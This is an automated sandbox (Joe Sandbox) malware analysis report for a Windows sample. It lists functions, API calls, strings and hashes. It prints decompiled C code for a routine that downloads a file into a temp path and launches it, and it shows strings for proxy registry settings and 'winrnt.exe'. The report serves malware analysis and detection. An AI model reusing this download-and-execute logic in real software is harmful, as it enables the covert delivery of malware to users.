Opcode Fuzzy Hash: 8146aa7d45ddf9213865f455b1552900cd1ed20f7322fa4dc1291e7ed423a0ba
Instruction Fuzzy Hash: 91015270104702ABD700EF64CA98BAB73E8AB54704F548C3AB5D8D62C0E7B9D5858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403E5D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,000000F0,00000000,00000002), ref: 00403E69
ReadFile.KERNEL32(?,004120E0,00000010,?,00000000,?,000000F0,00000000,00000002), ref: 00403E86
CloseHandle.KERNEL32(?,?,004120E0,00000010,?,00000000,?,000000F0,00000000,00000002), ref: 00403E92

Part of subcall function 004010B2: wsprintfA.USER32 ref: 004010C5

Strings

.exe, xrefs: 00403EB2

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$CloseHandlePointerReadwsprintf
String ID: .exe
API String ID: 1577166569-4119554291
Opcode ID: 78dcc47b41fa05499e9316a1394a172e3d56b315efb4b66b963808b80d090a4d
Instruction ID: 647d16fac30a5290989ad040a77d1bff97c5403f675f057a8e76d2fb7f2e3359
Opcode Fuzzy Hash: 78dcc47b41fa05499e9316a1394a172e3d56b315efb4b66b963808b80d090a4d
Instruction Fuzzy Hash: A6F0823020434069D6319B24CC06B5B3959BB45724FA08B3BB1D0F51E1C7BC1994C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00401625 Relevance: 6.1, APIs: 4, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

select.WS2_32(00000000,?,00000000,00000000,?), ref: 004016A3
recv.WS2_32(00000000,?,?,00000002), ref: 004016B3
recv.WS2_32(00000000,?,00000001,00000000), ref: 004016D2
recv.WS2_32(00000000,?,00000000,00000000), ref: 00401708

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: recv$select
String ID:
API String ID: 873784944-0
Opcode ID: 35811e58a5200e25412a58f5f26581c765e9b4b81a48c59a1c1f0089453fa5b6
Instruction ID: e7af01451db4feedd7893defef3d64e674ab9aaaa9521898a169f104c070c285
Opcode Fuzzy Hash: 35811e58a5200e25412a58f5f26581c765e9b4b81a48c59a1c1f0089453fa5b6
Instruction Fuzzy Hash: CC31A0301083429FE7209E28CC80B2BBBD8EB95748F184D3EF5D5A72E1E37A88158756

Uniqueness

Uniqueness Score: -1.00%

Function 004012C2 Relevance: 6.0, APIs: 4, Instructions: 28
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(?), ref: 004012E6
lstrcat.KERNEL32(00000000,?), ref: 004012EC
SetFileAttributesA.KERNEL32(?,00000080,00000000,?,?,00410C80), ref: 004012F7
DeleteFileA.KERNEL32(?,?,00000080,00000000,?,?,00410C80), ref: 004012FD

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$AttributesDeletelstrcatlstrcpy
String ID:
API String ID: 875521641-0
Opcode ID: 960cdc60b0a90aec0e204c4758cfb737aa11c475403ae2039b7710c46a144b8a
Instruction ID: 5708c53113cc1b56bc36642c0f65cd934a376a65166fd27ea49a52d45fe0ee74
Opcode Fuzzy Hash: 960cdc60b0a90aec0e204c4758cfb737aa11c475403ae2039b7710c46a144b8a
Instruction Fuzzy Hash: 78E0D87244020066F6203779EC8DBDB719CEB50354F100A3FF4C5711D1A6BC65D489AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401F59 Relevance: 4.5, APIs: 3, Instructions: 14
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCloseHandle.WININET(?), ref: 00401F64
InternetCloseHandle.WININET(00000000), ref: 00401F6C
closesocket.WS2_32(?), ref: 00401F77

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: CloseHandleInternet$closesocket
String ID:
API String ID: 100882886-0
Opcode ID: 4e15c4a382507cd70f8640d5f72f692e88ba4ba4737006376804cb1b35bfbab7
Instruction ID: 501145c92856ead8ce46014817bcd7c36fe8922fe37b6bae95739a5bbd7556d7
Opcode Fuzzy Hash: 4e15c4a382507cd70f8640d5f72f692e88ba4ba4737006376804cb1b35bfbab7
Instruction Fuzzy Hash: 30D0C930208011DFC7022B64DD8DE597EA5BB08309B1584B6F106BA1B2C7BA8C64EB09

Uniqueness

Uniqueness Score: -1.00%

Function 00401251 Relevance: 1.5, APIs: 1, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00411035,00000004), ref: 004012B2

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e14758ce4222a6fd1b12c506880de651468d72dce1c9bf3db712191967a7c6a0
Instruction ID: 775918bb7c27d9acf9797bce50a7f2c96f576fb8ca6b7d224f53a362bc0c1497
Opcode Fuzzy Hash: e14758ce4222a6fd1b12c506880de651468d72dce1c9bf3db712191967a7c6a0
Instruction Fuzzy Hash: 7BF0247131431557E7308A98EC45FBB3399EF91358F50003EF705EA7E0E279580982AE

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.KERNEL32(00000000,00000020,00401F95,00000000,?,?,00403EF3,?,80000000,00000001,00000000,00000003,00000000,00000000,wininet.dll,iphlpapi.dll), ref: 00401009

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bfbca1a7c6641442546660a61b7a9356c2fae9436f0459e1fa0aacead7504433
Instruction ID: 33a13357a2b9b3ac3e6dc3489ca669c79409c2bef5ada4d1ab7c4672adc2931f
Opcode Fuzzy Hash: bfbca1a7c6641442546660a61b7a9356c2fae9436f0459e1fa0aacead7504433
Instruction Fuzzy Hash: B7A002741505286AED212B21AD0AF6A261AFB40704FD480F67504A44F1C5BD1921591C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040211B Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 243
filestringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E0040211B(void* __eax, signed int __edx, char _a72, char _a80, char _a4160, char _a4168, char _a4440, char _a4712, signed char* _a4988, intOrPtr _a5004, signed int _a5016) {
				char _v8;
				void* _v20;
				void _v24;
				long _v28;
				signed int _t47;
				char* _t50;
				char* _t52;
				char* _t54;
				char* _t56;
				void* _t58;
				char* _t59;
				CHAR* _t61;
				long _t62;
				void* _t65;
				long _t69;
				CHAR* _t75;
				CHAR* _t76;
				void* _t93;
				CHAR* _t105;
				void* _t106;
				struct _STARTUPINFOA* _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;
				signed char* _t111;
				signed int _t112;
				long _t120;
				void* _t122;
				signed int _t124;
				signed int _t126;
				DWORD* _t129;

				_t112 = __edx;
				_push(__eax);
				E00405C00();
				_t124 = __edx;
				_t126 = _a5016;
				_t111 = _a4988;
				while(1) {
					_t47 =  *_t111 & 0x000000ff;
					_t112 = _t112 & 0xffffff00 | _t47 == 0x00000020;
					_t49 = _t47 & 0xffffff00 | _t47 == 0x00000009 | _t112;
					if(((_t47 & 0xffffff00 | _t47 == 0x00000009 | _t112) & 0x00000001) == 0) {
						break;
					}
					_t111 =  &(_t111[1]);
				}
				_push(_t111);
				_t104 =  &_a80;
				_push( &_a80);
				L00405E20();
				_t50 = E0040134D(_t49, 0xd);
				if(_t50 != 0) {
					 *_t50 = 0;
				}
				_t52 = E0040134D(_t104, 0xa);
				if(_t52 != 0) {
					 *_t52 = 0;
				}
				_t54 = E0040134D(_t104, 0x20);
				if(_t54 != 0) {
					 *_t54 = 0;
				}
				_t56 = E0040134D(_t104, 9);
				if(_t56 != 0) {
					 *_t56 = 0;
				}
				if((_t126 & 0x00000002) == 0) {
					_t58 = E004019E8(_t104, _t124, 1);
				} else {
					_t58 = E00401CB0(_t104);
				}
				_t125 = _t58;
				_t59 = "urlinj_conn";
				if(_t58 == 0) {
					L40:
					E00401FBB(_t59);
					_t61 = 0;
				} else {
					_t105 =  &_a4712;
					_t62 = GetTempPathA(0x104, _t105);
					if(_a5004 == 0) {
						GetTempFileNameA(_t105, "tmp", 0,  &_a4440);
					} else {
						_push(_a5004);
						_push(0x41103e);
						_push(_t105);
						_push( &_a4440);
						L00405E20();
						_push(_t62);
						L00405E30();
						_push(_t62);
						L00405E30();
					}
					_t65 = CreateFileA( &_a4440, 0x40000000, 0, 0, 2, 0x80, 0);
					_t106 = _t65;
					if(_t65 == 0 || _t65 == 0xffffffff) {
						E00401F59(_t125);
						_t59 = "urlinj_creat";
						goto L40;
					} else {
						while(1) {
							_t122 =  &_a72;
							_t69 = E00401E00(_t125, _t122, 0x1000);
							_v28 = _t69;
							_t120 = _t69;
							if(_t120 == 0) {
								break;
							}
							if(_t120 != 0xffffffff) {
								WriteFile(_t106, _t122, _t120,  &_v28, 0);
								continue;
							}
							break;
						}
						E00401F59(_t125);
						CloseHandle(_t106);
						if(_v28 == 0) {
							if((_t126 & 0x00000001) == 0) {
								L31:
								_t107 =  &_v8;
								GetStartupInfoA(_t107);
								_push( &_v24);
								_t75 = 0;
								_push(_t107);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								if((_t126 & 0x00000001) != 0) {
									_t75 =  &_a4440;
								}
								_push(_t75);
								if((_t126 & 0x00000001) == 0) {
									_t76 =  &_a4440;
								} else {
									_t76 =  &_a4168;
								}
								if(CreateProcessA(_t76, ??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) {
									CloseHandle(_v20);
									_t108 = E00401000(0x20c);
									 *_t108 = _v24;
									_t40 = _t108 + 4; // 0x4
									_push( &_a4440);
									L00405E20();
									if((_t126 & 0x00000001) == 0) {
										 *((char*)(_t108 + 0x108)) = 0;
									} else {
										_push( &_a4160);
										_t42 = _t108 + 0x108; // 0x108
										L00405E20();
									}
									CloseHandle(CreateThread(0, 0x10000, E004020E2, _t108, 0, _t129));
									_t61 = 1;
								} else {
									DeleteFileA( &_a4440);
									if((_t126 & 0x00000001) != 0) {
										DeleteFileA( &_a4168);
									}
									_t59 = "urlinj_fork";
									goto L40;
								}
							} else {
								_t109 =  &_a4168;
								GetTempFileNameA( &_a4712, "tmp", 0, _t109);
								_t93 = CreateFileA(_t109, 0x40000000, 0, 0, 2, 0x80, 0);
								_t110 = _t93;
								if(_t93 == 0 || _t93 == 0xffffffff) {
									DeleteFileA( &_a4440);
									_t59 = "urlinj_creat_f";
									goto L40;
								} else {
									WriteFile(_t110, 0x40fa40, 0x600,  &_v28, 0);
									CloseHandle(_t110);
									goto L31;
								}
							}
						} else {
							DeleteFileA( &_a4440);
							_t59 = "urlinj_xfer";
							goto L40;
						}
					}
				}
				return _t61;
			}

APIs

lstrcpy.KERNEL32(?,?), ref: 00402158
GetTempPathA.KERNEL32(00000104,?,?,?,?,00000000,?,00000000,?,00402C02,00000000,00000000,?,Default Flags,00000000,00000003), ref: 004021E0
lstrcpy.KERNEL32(?,?), ref: 00402204
lstrcat.KERNEL32(00000000,?), ref: 0040220A
lstrcat.KERNEL32(00000000,00000000), ref: 00402210
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040223F

Part of subcall function 004019E8: lstrcpy.KERNEL32(?,?), ref: 00401A14
Part of subcall function 004019E8: lstrlen.KERNEL32(00000000,?,?), ref: 00401A1A
Part of subcall function 004019E8: htons.WS2_32(00000050), ref: 00401A7B
Part of subcall function 004019E8: socket.WS2_32(00000002,00000001,00000006), ref: 00401AD6
Part of subcall function 004019E8: closesocket.WS2_32(00000000), ref: 00401AF9
Part of subcall function 004019E8: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00401C0F
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000002,00000004), ref: 00401C35
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000006,00000004,00000004), ref: 00401C41
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000005,00000004,00000004), ref: 00401C4D

GetTempFileNameA.KERNEL32(?,tmp,00000000,?), ref: 00402220
WriteFile.KERNEL32(00000000,?,00000000,00412190,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040226F

Part of subcall function 00401E00: InternetReadFile.WININET(?,?,?,?), ref: 00401E24

CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 00402299
DeleteFileA.KERNEL32(?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 004022AC
GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 004022DA
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?,00000000,?,40000000,00000000,00000000), ref: 004022F2
DeleteFileA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?,00000000,?,40000000,00000000), ref: 0040230A
WriteFile.KERNEL32(00000000,0040FA40,00000600,00412190,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040232B
CloseHandle.KERNEL32(00000000,00000000,0040FA40,00000600,00412190,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000), ref: 00402331
GetStartupInfoA.KERNEL32(00000000), ref: 0040233B
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,?,40000000,00000000,00000000,00000002), ref: 0040237D
DeleteFileA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,?,40000000,00000000,00000000), ref: 0040238E
DeleteFileA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,?,40000000,00000000), ref: 004023A0
CloseHandle.KERNEL32(00000012,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,?,40000000,00000000,00000000), ref: 004023B7
lstrcpy.KERNEL32(00000004,?), ref: 004023D3
lstrcpy.KERNEL32(00000108,?), ref: 004023EC
CreateThread.KERNEL32 ref: 0040240C
CloseHandle.KERNEL32(00000000,00000000,00010000,004020E2,00000000,00000000,?,00000004,?,00000012,?,00000000,00000000,00000000,00000000,00000000), ref: 00402412

Strings

urlinj_creat_f, xrefs: 0040230F
urlinj_xfer, xrefs: 004022B1
urlinj_conn, xrefs: 004021C8
urlinj_fork, xrefs: 004023A5
tmp, xrefs: 0040221A, 004022CD
urlinj_creat, xrefs: 00402256

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$Internetlstrcpy$CloseCreateDeleteHandle$OptionTemp$NameWritelstrcat$InfoOpenPathProcessReadStartupThreadclosesockethtonslstrlensocket
String ID: tmp$urlinj_conn$urlinj_creat$urlinj_creat_f$urlinj_fork$urlinj_xfer
API String ID: 910217646-3391900140
Opcode ID: b4d65e794a7e245c062c512eccec29e40d4a616b8a204c53ad4485c46c86ab07
Instruction ID: 895ea3fb7fd56845c489c34011873c515f9ddc39e1368bf3964ea777627726e2
Opcode Fuzzy Hash: b4d65e794a7e245c062c512eccec29e40d4a616b8a204c53ad4485c46c86ab07
Instruction Fuzzy Hash: EB71E6712443406AE730A2B58D8EFEB229D9F84704F50443BBA84FA2D2D6FCD944866E

Uniqueness

Uniqueness Score: -1.00%

Function 00401832 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 127registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,00000000,00000000,?,?,?,?,00402515,?,00402796), ref: 00401870
RegEnumKeyA.ADVAPI32(80000003,00402515,?,00001000), ref: 004019C7
RegCloseKey.ADVAPI32(?,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,00000000,00000000,?,?,?,?,00402515,?), ref: 004019D8

Strings

_Classes, xrefs: 00401898
ProxyEnable, xrefs: 004018EB
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 00401866
\Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004018B8
Connections, xrefs: 00401927

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: CloseCreateEnum
String ID: Connections$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes
API String ID: 2702359829-1466506419
Opcode ID: a58cf58695691f8b38c612d179d2e715774f247d0874e1fd27e91d23bfcce8df
Instruction ID: 8d3d3186799d04fc24a63bfaa52dde977d0271b4b09f6de0e5c37a32578555ba
Opcode Fuzzy Hash: a58cf58695691f8b38c612d179d2e715774f247d0874e1fd27e91d23bfcce8df
Instruction Fuzzy Hash: 5741A3B11483057AF720AA618C51FAB76DCEF84748F40083FB685B51E1D7BCD958C6AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040395A Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetOpenA), ref: 004039BA
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004039CA
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 004039DA
GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 004039EA
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 004039FA

Strings

InternetOpenUrlA, xrefs: 0040396C, 004039BF
InternetOpenA, xrefs: 0040395A, 004039B4
InternetReadFile, xrefs: 0040397E, 004039CF
InternetSetOptionA, xrefs: 00403990, 004039DF
winrnt.exe, xrefs: 00403A10
InternetCloseHandle, xrefs: 004039A2, 004039EF

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: AddressProc
String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$winrnt.exe
API String ID: 190572456-2600980705
Opcode ID: 8c60e9bad0216edcd5d2f60f70b2290ab8f73cca25e89bcfd46c5932b96ebbff
Instruction ID: 3464b26757038a97369b87fc09c3feac6c6e71abbe39daa14242ab02e268b348
Opcode Fuzzy Hash: 8c60e9bad0216edcd5d2f60f70b2290ab8f73cca25e89bcfd46c5932b96ebbff
Instruction Fuzzy Hash: 1D11A3B0508642B9C701DB7D4D8459A2D4EB5167213205EB3A0E3FA1E2D7FC8AC18F6E

Uniqueness

Uniqueness Score: -1.00%

Function 004010F7 Relevance: 15.1, APIs: 10, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040111F
SetFileAttributesA.KERNEL32(?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040113D
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401155
ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,?,80000000), ref: 004011A7
CloseHandle.KERNEL32(00000000,00000000,?,00001000,?,00000000,00000000,?,?,?,00000000,00000000,?,00001000,?,00000000), ref: 004011B1
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00001000,?,00000000,00000000,?,?,?,00000000,00000000,?,00001000,?), ref: 004011B7
DeleteFileA.KERNEL32(?,00000000,00000000,00000000,?,00001000,?,00000000,00000000,?,?,?,00000000,00000000,?,00001000), ref: 004011BD

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$CloseCreateHandle$AttributesDeleteRead
String ID:
API String ID: 3513576528-0
Opcode ID: f19d6d95f7e708bce74ecd1bfa18d9df29a78680b820b88f9bf7c0962a836d77
Instruction ID: ead7ac7a0f60c3fe050b3408b844e5b53074d73edae75ab17160c13d06c43734
Opcode Fuzzy Hash: f19d6d95f7e708bce74ecd1bfa18d9df29a78680b820b88f9bf7c0962a836d77
Instruction Fuzzy Hash: D2118F3024070036F23162229C4AFAF218DCF89B58FA0453BB354F91D1D6BCA841567E

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 108stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00401CF6
lstrcpy.KERNEL32(?,?), ref: 00401D1E
wsprintfA.USER32 ref: 00401D6F
wsprintfA.USER32 ref: 00401D91

Strings

%02X, xrefs: 00401D8B
